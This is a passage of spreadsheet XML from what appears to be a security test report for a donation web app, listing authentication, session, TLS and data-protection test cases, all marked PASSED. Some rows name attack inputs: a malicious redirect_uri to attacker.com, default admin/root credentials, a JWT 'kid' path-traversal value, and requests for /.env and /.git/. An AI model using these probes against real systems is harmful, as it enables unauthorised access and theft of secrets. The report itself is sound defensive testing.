          <t>Brute force OTP list</t>
        </is>
      </c>
      <c r="F54" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G54" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H54" s="16" t="inlineStr">
        <is>
          <t>MFA session terminated after 3 incorrect attempts; OTP invalidated</t>
        </is>
      </c>
    </row>
    <row r="55" ht="22" customHeight="1">
      <c r="A55" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-019</t>
        </is>
      </c>
      <c r="B55" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C55" s="16" t="inlineStr">
        <is>
          <t>OAuth 2.0 State Parameter Verification</t>
        </is>
      </c>
      <c r="D55" s="16" t="inlineStr">
        <is>
          <t>Initiate OAuth login omitting state CSRF parameter</t>
        </is>
      </c>
      <c r="E55" s="16" t="inlineStr">
        <is>
          <t>OAuth flow without state</t>
        </is>
      </c>
      <c r="F55" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G55" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H55" s="16" t="inlineStr">
        <is>
          <t>Authentication flow rejected; Invalid CSRF state parameter</t>
        </is>
      </c>
    </row>
    <row r="56" ht="22" customHeight="1">
      <c r="A56" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-020</t>
        </is>
      </c>
      <c r="B56" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C56" s="16" t="inlineStr">
        <is>
          <t>OAuth 2.0 Redirect URI Spoofing Prevention</t>
        </is>
      </c>
      <c r="D56" s="16" t="inlineStr">
        <is>
          <t>Set OAuth redirect_uri to https://attacker.com</t>
        </is>
      </c>
      <c r="E56" s="16" t="inlineStr">
        <is>
          <t>Malicious redirect_uri</t>
        </is>
      </c>
      <c r="F56" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G56" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H56" s="16" t="inlineStr">
        <is>
          <t>OAuth provider rejects non-whitelisted redirect URI</t>
        </is>
      </c>
    </row>
    <row r="57" ht="22" customHeight="1">
      <c r="A57" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-021</t>
        </is>
      </c>
      <c r="B57" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C57" s="16" t="inlineStr">
        <is>
          <t>Password Change Requires Current Password Verification</t>
        </is>
      </c>
      <c r="D57" s="16" t="inlineStr">
        <is>
          <t>Attempt password change without providing existing password</t>
        </is>
      </c>
      <c r="E57" s="16" t="inlineStr">
        <is>
          <t>Password change payload</t>
        </is>
      </c>
      <c r="F57" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G57" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H57" s="16" t="inlineStr">
        <is>
          <t>Current password validation strictly enforced before password update</t>
        </is>
      </c>
    </row>
    <row r="58" ht="22" customHeight="1">
      <c r="A58" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-022</t>
        </is>
      </c>
      <c r="B58" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C58" s="16" t="inlineStr">
        <is>
          <t>Default Administrative Credentials Audit</t>
        </is>
      </c>
      <c r="D58" s="16" t="inlineStr">
        <is>
          <t>Attempt login using admin/admin, root/root, test/test</t>
        </is>
      </c>
      <c r="E58" s="16" t="inlineStr">
        <is>
          <t>Default credential list</t>
        </is>
      </c>
      <c r="F58" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G58" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H58" s="16" t="inlineStr">
        <is>
          <t>All default accounts removed; Administrative access requires MFA</t>
        </is>
      </c>
    </row>
    <row r="59" ht="22" customHeight="1">
      <c r="A59" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-023</t>
        </is>
      </c>
      <c r="B59" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C59" s="16" t="inlineStr">
        <is>
          <t>Authentication Endpoint Rate Limiting per IP</t>
        </is>
      </c>
      <c r="D59" s="16" t="inlineStr">
        <is>
          <t>Send 100 authentication requests per minute from single IP</t>
        </is>
      </c>
      <c r="E59" s="16" t="inlineStr">
        <is>
          <t>Rate limit test</t>
        </is>
      </c>
      <c r="F59" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G59" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H59" s="16" t="inlineStr">
        <is>
          <t>IP blocked with 429 Too Many Requests after 20 req/min threshold</t>
        </is>
      </c>
    </row>
    <row r="60" ht="22" customHeight="1">
      <c r="A60" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-024</t>
        </is>
      </c>
      <c r="B60" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C60" s="16" t="inlineStr">
        <is>
          <t>Session Timeout due to Inactivity</t>
        </is>
      </c>
      <c r="D60" s="16" t="inlineStr">
        <is>
          <t>Leave authenticated session idle for 30 minutes</t>
        </is>
      </c>
      <c r="E60" s="16" t="inlineStr">
        <is>
          <t>Inactivity timer check</t>
        </is>
      </c>
      <c r="F60" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G60" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H60" s="16" t="inlineStr">
        <is>
          <t>Session automatically invalidated after 15 minutes of inactivity</t>
        </is>
      </c>
    </row>
    <row r="61" ht="22" customHeight="1">
      <c r="A61" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-025</t>
        </is>
      </c>
      <c r="B61" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C61" s="16" t="inlineStr">
        <is>
          <t>Session Regeneration Post-Privilege Escalation</t>
        </is>
      </c>
      <c r="D61" s="16" t="inlineStr">
        <is>
          <t>Promote user role and inspect session identifier</t>
        </is>
      </c>
      <c r="E61" s="16" t="inlineStr">
        <is>
          <t>Role upgrade check</t>
        </is>
      </c>
      <c r="F61" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G61" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H61" s="16" t="inlineStr">
        <is>
          <t>Session ID regenerated immediately upon role change</t>
        </is>
      </c>
    </row>
    <row r="62" ht="22" customHeight="1">
      <c r="A62" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-026</t>
        </is>
      </c>
      <c r="B62" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C62" s="16" t="inlineStr">
        <is>
          <t>OAuth Authorization Code Reuse Prevention</t>
        </is>
      </c>
      <c r="D62" s="16" t="inlineStr">
        <is>
          <t>Exchange same OAuth authorization code twice for token</t>
        </is>
      </c>
      <c r="E62" s="16" t="inlineStr">
        <is>
          <t>Replayed auth code</t>
        </is>
      </c>
      <c r="F62" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G62" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H62" s="16" t="inlineStr">
        <is>
          <t>Authorization code invalidated after single use; Token request denied</t>
        </is>
      </c>
    </row>
    <row r="63" ht="22" customHeight="1">
      <c r="A63" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-027</t>
        </is>
      </c>
      <c r="B63" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C63" s="16" t="inlineStr">
        <is>
          <t>Weak Security Question Bypass Prevention</t>
        </is>
      </c>
      <c r="D63" s="16" t="inlineStr">
        <is>
          <t>Attempt account recovery bypassing security questions</t>
        </is>
      </c>
      <c r="E63" s="16" t="inlineStr">
        <is>
          <t>Bypass security questions</t>
        </is>
      </c>
      <c r="F63" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G63" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H63" s="16" t="inlineStr">
        <is>
          <t>Security questions replaced with secure email / SMS OTP verification</t>
        </is>
      </c>
    </row>
    <row r="64" ht="22" customHeight="1">
      <c r="A64" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-028</t>
        </is>
      </c>
      <c r="B64" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C64" s="16" t="inlineStr">
        <is>
          <t>JWT Kid Header Path Traversal Attack</t>
        </is>
      </c>
      <c r="D64" s="16" t="inlineStr">
        <is>
          <t>Inject key id 'kid': '../../../../dev/null' into JWT header</t>
        </is>
      </c>
      <c r="E64" s="16" t="inlineStr">
        <is>
          <t>Path traversal kid</t>
        </is>
      </c>
      <c r="F64" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G64" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H64" s="16" t="inlineStr">
        <is>
          <t>Kid parameter validated against strict allowed key registry</t>
        </is>
      </c>
    </row>
    <row r="65" ht="22" customHeight="1">
      <c r="A65" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-029</t>
        </is>
      </c>
      <c r="B65" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C65" s="16" t="inlineStr">
        <is>
          <t>JWT Key Confusion (RSA vs HMAC) Attack</t>
        </is>
      </c>
      <c r="D65" s="16" t="inlineStr">
        <is>
          <t>Change RSA public key to HMAC secret in JWT header</t>
        </is>
      </c>
      <c r="E65" s="16" t="inlineStr">
        <is>
          <t>Key confusion payload</t>
        </is>
      </c>
      <c r="F65" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G65" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H65" s="16" t="inlineStr">
        <is>
          <t>Algorithm strictly pinned to RS256 / HS256 as configured</t>
        </is>
      </c>
    </row>
    <row r="66" ht="22" customHeight="1">
      <c r="A66" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-030</t>
        </is>
      </c>
      <c r="B66" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C66" s="16" t="inlineStr">
        <is>
          <t>Password Reset Rate Limiting per Account</t>
        </is>
      </c>
      <c r="D66" s="16" t="inlineStr">
        <is>
          <t>Trigger 50 password reset requests for single email</t>
        </is>
      </c>
      <c r="E66" s="16" t="inlineStr">
        <is>
          <t>Reset flood attack</t>
        </is>
      </c>
      <c r="F66" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G66" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H66" s="16" t="inlineStr">
        <is>
          <t>Max 3 reset requests allowed per hour per email address</t>
        </is>
      </c>
    </row>
    <row r="67" ht="22" customHeight="1">
      <c r="A67" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-031</t>
        </is>
      </c>
      <c r="B67" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C67" s="16" t="inlineStr">
        <is>
          <t>Plaintext Password Transmit Audit</t>
        </is>
      </c>
      <c r="D67" s="16" t="inlineStr">
        <is>
          <t>Submit login form over HTTP unencrypted protocol</t>
        </is>
      </c>
      <c r="E67" s="16" t="inlineStr">
        <is>
          <t>Plaintext HTTP POST</t>
        </is>
      </c>
      <c r="F67" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G67" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H67" s="16" t="inlineStr">
        <is>
          <t>HTTP automatically upgraded to HTTPS via HSTS; Plaintext transmission blocked</t>
        </is>
      </c>
    </row>
    <row r="68" ht="22" customHeight="1">
      <c r="A68" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-032</t>
        </is>
      </c>
      <c r="B68" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C68" s="16" t="inlineStr">
        <is>
          <t>Session Storage Exposure Prevention</t>
        </is>
      </c>
      <c r="D68" s="16" t="inlineStr">
        <is>
          <t>Store sensitive user JWT in browser localStorage without encryption</t>
        </is>
      </c>
      <c r="E68" s="16" t="inlineStr">
        <is>
          <t>localStorage audit</t>
        </is>
      </c>
      <c r="F68" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G68" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H68" s="16" t="inlineStr">
        <is>
          <t>Tokens stored in HttpOnly, Secure cookies; LocalStorage sensitive data absent</t>
        </is>
      </c>
    </row>
    <row r="69" ht="22" customHeight="1">
      <c r="A69" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-033</t>
        </is>
      </c>
      <c r="B69" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C69" s="16" t="inlineStr">
        <is>
          <t>Auth Header Bearer Token Format Validation</t>
        </is>
      </c>
      <c r="D69" s="16" t="inlineStr">
        <is>
          <t>Send Header 'Authorization: Bearer &lt;invalid-characters&gt;'</t>
        </is>
      </c>
      <c r="E69" s="16" t="inlineStr">
        <is>
          <t>Malformed bearer token</t>
        </is>
      </c>
      <c r="F69" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G69" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H69" s="16" t="inlineStr">
        <is>
          <t>Regex validation requires valid JWT format; 401 Unauthorized</t>
        </is>
      </c>
    </row>
    <row r="70" ht="22" customHeight="1">
      <c r="A70" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-034</t>
        </is>
      </c>
      <c r="B70" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C70" s="16" t="inlineStr">
        <is>
          <t>Account Deletion Invalidate Active Sessions</t>
        </is>
      </c>
      <c r="D70" s="16" t="inlineStr">
        <is>
          <t>Delete user account and attempt API call with active token</t>
        </is>
      </c>
      <c r="E70" s="16" t="inlineStr">
        <is>
          <t>Post-deletion API call</t>
        </is>
      </c>
      <c r="F70" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G70" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H70" s="16" t="inlineStr">
        <is>
          <t>Account status checked in cache/db; 401 Account Inactive returned</t>
        </is>
      </c>
    </row>
    <row r="71" ht="22" customHeight="1">
      <c r="A71" s="15" t="inlineStr">
        <is>
          <t>SEC-AUTH-035</t>
        </is>
      </c>
      <c r="B71" s="16" t="inlineStr">
        <is>
          <t>Broken Authentication &amp; Sessions</t>
        </is>
      </c>
      <c r="C71" s="16" t="inlineStr">
        <is>
          <t>Impersonation Feature Access Authorization</t>
        </is>
      </c>
      <c r="D71" s="16" t="inlineStr">
        <is>
          <t>Attempt admin impersonation without SUPERADMIN role</t>
        </is>
      </c>
      <c r="E71" s="16" t="inlineStr">
        <is>
          <t>Impersonation API call</t>
        </is>
      </c>
      <c r="F71" s="19" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="G71" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H71" s="16" t="inlineStr">
        <is>
          <t>Impersonation restricted to audited SUPERADMIN role with full audit logging</t>
        </is>
      </c>
    </row>
    <row r="72" ht="22" customHeight="1">
      <c r="A72" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-001</t>
        </is>
      </c>
      <c r="B72" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C72" s="16" t="inlineStr">
        <is>
          <t>TLS / HTTPS Protocol Version Enforcement</t>
        </is>
      </c>
      <c r="D72" s="16" t="inlineStr">
        <is>
          <t>Connect to server using TLS 1.0 or TLS 1.1 protocol</t>
        </is>
      </c>
      <c r="E72" s="16" t="inlineStr">
        <is>
          <t>Deprecation protocol connection</t>
        </is>
      </c>
      <c r="F72" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G72" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H72" s="16" t="inlineStr">
        <is>
          <t>Server requires TLS 1.2 or TLS 1.3; Older protocols disabled</t>
        </is>
      </c>
    </row>
    <row r="73" ht="22" customHeight="1">
      <c r="A73" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-002</t>
        </is>
      </c>
      <c r="B73" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C73" s="16" t="inlineStr">
        <is>
          <t>TLS Weak Cipher Suite Rejection</t>
        </is>
      </c>
      <c r="D73" s="16" t="inlineStr">
        <is>
          <t>Connect using NULL, RC4, 3DES, or EXPORT ciphers</t>
        </is>
      </c>
      <c r="E73" s="16" t="inlineStr">
        <is>
          <t>Weak cipher suite handshake</t>
        </is>
      </c>
      <c r="F73" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G73" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H73" s="16" t="inlineStr">
        <is>
          <t>Handshake rejected; Only forward-secrecy AEAD ciphers supported (ECDHE-RSA-AES128-GCM)</t>
        </is>
      </c>
    </row>
    <row r="74" ht="22" customHeight="1">
      <c r="A74" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-003</t>
        </is>
      </c>
      <c r="B74" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C74" s="16" t="inlineStr">
        <is>
          <t>HTTP Strict Transport Security (HSTS) Header Verification</t>
        </is>
      </c>
      <c r="D74" s="16" t="inlineStr">
        <is>
          <t>Inspect HTTP response headers for HSTS directive</t>
        </is>
      </c>
      <c r="E74" s="16" t="inlineStr">
        <is>
          <t>curl -I https://sharebite.org</t>
        </is>
      </c>
      <c r="F74" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G74" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H74" s="16" t="inlineStr">
        <is>
          <t>Strict-Transport-Security: max-age=31536000; includeSubDomains; preload present</t>
        </is>
      </c>
    </row>
    <row r="75" ht="22" customHeight="1">
      <c r="A75" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-004</t>
        </is>
      </c>
      <c r="B75" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C75" s="16" t="inlineStr">
        <is>
          <t>PII Data Encryption at Rest in Database</t>
        </is>
      </c>
      <c r="D75" s="16" t="inlineStr">
        <is>
          <t>Inspect database storage for donor phone, address, tax ID</t>
        </is>
      </c>
      <c r="E75" s="16" t="inlineStr">
        <is>
          <t>Database storage inspection</t>
        </is>
      </c>
      <c r="F75" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G75" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H75" s="16" t="inlineStr">
        <is>
          <t>Sensitive PII encrypted at column-level using AES-256-GCM</t>
        </is>
      </c>
    </row>
    <row r="76" ht="22" customHeight="1">
      <c r="A76" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-005</t>
        </is>
      </c>
      <c r="B76" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C76" s="16" t="inlineStr">
        <is>
          <t>Credit Card &amp; Payment Data PCI-DSS Compliance</t>
        </is>
      </c>
      <c r="D76" s="16" t="inlineStr">
        <is>
          <t>Inspect payment transaction records</t>
        </is>
      </c>
      <c r="E76" s="16" t="inlineStr">
        <is>
          <t>Payment data storage check</t>
        </is>
      </c>
      <c r="F76" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G76" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H76" s="16" t="inlineStr">
        <is>
          <t>No raw PAN or CVV stored; Tokenized via PCI-DSS compliant payment gateway</t>
        </is>
      </c>
    </row>
    <row r="77" ht="22" customHeight="1">
      <c r="A77" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-006</t>
        </is>
      </c>
      <c r="B77" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C77" s="16" t="inlineStr">
        <is>
          <t>PII Masking in API Log Files</t>
        </is>
      </c>
      <c r="D77" s="16" t="inlineStr">
        <is>
          <t>Trigger user registration and inspect server log output</t>
        </is>
      </c>
      <c r="E77" s="16" t="inlineStr">
        <is>
          <t>Log file inspection</t>
        </is>
      </c>
      <c r="F77" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G77" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H77" s="16" t="inlineStr">
        <is>
          <t>Passwords, credit cards, and SSNs masked as ***REDACTED*** in logs</t>
        </is>
      </c>
    </row>
    <row r="78" ht="22" customHeight="1">
      <c r="A78" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-007</t>
        </is>
      </c>
      <c r="B78" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C78" s="16" t="inlineStr">
        <is>
          <t>API Response PII Minimization Audit</t>
        </is>
      </c>
      <c r="D78" s="16" t="inlineStr">
        <is>
          <t>Inspect GET /api/donations response payload for unneeded PII</t>
        </is>
      </c>
      <c r="E78" s="16" t="inlineStr">
        <is>
          <t>Response field audit</t>
        </is>
      </c>
      <c r="F78" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G78" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H78" s="16" t="inlineStr">
        <is>
          <t>API returns only required public fields; Private email/phone stripped</t>
        </is>
      </c>
    </row>
    <row r="79" ht="22" customHeight="1">
      <c r="A79" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-008</t>
        </is>
      </c>
      <c r="B79" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C79" s="16" t="inlineStr">
        <is>
          <t>Cryptographic Pseudo-Random Generator Audit</t>
        </is>
      </c>
      <c r="D79" s="16" t="inlineStr">
        <is>
          <t>Inspect token and random key generation functions in code</t>
        </is>
      </c>
      <c r="E79" s="16" t="inlineStr">
        <is>
          <t>Code audit for Math.random()</t>
        </is>
      </c>
      <c r="F79" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G79" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H79" s="16" t="inlineStr">
        <is>
          <t>Uses crypto.randomBytes() / SecureRandom; Math.random() avoided for security</t>
        </is>
      </c>
    </row>
    <row r="80" ht="22" customHeight="1">
      <c r="A80" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-009</t>
        </is>
      </c>
      <c r="B80" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C80" s="16" t="inlineStr">
        <is>
          <t>API Secret Key Exposure in Source Code Check</t>
        </is>
      </c>
      <c r="D80" s="16" t="inlineStr">
        <is>
          <t>Search repository for hardcoded AWS, JWT, or DB keys</t>
        </is>
      </c>
      <c r="E80" s="16" t="inlineStr">
        <is>
          <t>Git secret scanner audit</t>
        </is>
      </c>
      <c r="F80" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G80" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H80" s="16" t="inlineStr">
        <is>
          <t>No hardcoded credentials; All secrets injected via environment variables</t>
        </is>
      </c>
    </row>
    <row r="81" ht="22" customHeight="1">
      <c r="A81" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-010</t>
        </is>
      </c>
      <c r="B81" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C81" s="16" t="inlineStr">
        <is>
          <t>Sensible Error Message Stack Trace Suppression</t>
        </is>
      </c>
      <c r="D81" s="16" t="inlineStr">
        <is>
          <t>Trigger 500 Internal Server Error in production mode</t>
        </is>
      </c>
      <c r="E81" s="16" t="inlineStr">
        <is>
          <t>Trigger unhandled exception</t>
        </is>
      </c>
      <c r="F81" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G81" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H81" s="16" t="inlineStr">
        <is>
          <t>Generic error payload returned: 'Internal Server Error'; Stack traces hidden</t>
        </is>
      </c>
    </row>
    <row r="82" ht="22" customHeight="1">
      <c r="A82" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-011</t>
        </is>
      </c>
      <c r="B82" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C82" s="16" t="inlineStr">
        <is>
          <t>Directory Listing / Browsing Prevention</t>
        </is>
      </c>
      <c r="D82" s="16" t="inlineStr">
        <is>
          <t>Request GET /static/, /uploads/, /assets/ without index file</t>
        </is>
      </c>
      <c r="E82" s="16" t="inlineStr">
        <is>
          <t>Directory URL request</t>
        </is>
      </c>
      <c r="F82" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G82" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H82" s="16" t="inlineStr">
        <is>
          <t>Directory indexing disabled; Returns 403 Forbidden or 404 Not Found</t>
        </is>
      </c>
    </row>
    <row r="83" ht="22" customHeight="1">
      <c r="A83" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-012</t>
        </is>
      </c>
      <c r="B83" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C83" s="16" t="inlineStr">
        <is>
          <t>Sensitive Configuration File Access Denial</t>
        </is>
      </c>
      <c r="D83" s="16" t="inlineStr">
        <is>
          <t>Request GET /.env, /config.json, /web.config, /.git/</t>
        </is>
      </c>
      <c r="E83" s="16" t="inlineStr">
        <is>
          <t>Sensitive path requests</t>
        </is>
      </c>
      <c r="F83" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G83" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H83" s="16" t="inlineStr">
        <is>
          <t>All dotfiles and configuration paths return 404 / 403 Access Denied</t>
        </is>
      </c>
    </row>
    <row r="84" ht="22" customHeight="1">
      <c r="A84" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-013</t>
        </is>
      </c>
      <c r="B84" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C84" s="16" t="inlineStr">
        <is>
          <t>S3 Bucket / Object Storage Access Permissions</t>
        </is>
      </c>
      <c r="D84" s="16" t="inlineStr">
        <is>
          <t>Attempt unauthenticated public access to private S3 bucket root</t>
        </is>
      </c>
      <c r="E84" s="16" t="inlineStr">
        <is>
          <t>Direct S3 URI request</t>
        </is>
      </c>
      <c r="F84" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G84" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H84" s="16" t="inlineStr">
        <is>
          <t>S3 bucket block public access enabled; Access restricted via IAM roles</t>
        </is>
      </c>
    </row>
    <row r="85" ht="22" customHeight="1">
      <c r="A85" s="15" t="inlineStr">
        <is>
          <t>SEC-DAT-014</t>
        </is>
      </c>
      <c r="B85" s="16" t="inlineStr">
        <is>
          <t>Sensitive Data &amp; Cryptography</t>
        </is>
      </c>
      <c r="C85" s="16" t="inlineStr">
        <is>
          <t>Database Backup Encryption Audit</t>
        </is>
      </c>
      <c r="D85" s="16" t="inlineStr">
        <is>
          <t>Inspect automated database backup artifacts</t>
        </is>
      </c>
      <c r="E85" s="16" t="inlineStr">
        <is>
          <t>Backup file inspection</t>
        </is>
      </c>
      <c r="F85" s="17" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="G85" s="18" t="inlineStr">
        <is>
          <t>PASSED</t>
        </is>
      </c>
      <c r="H85" s="16" t="inlineStr">
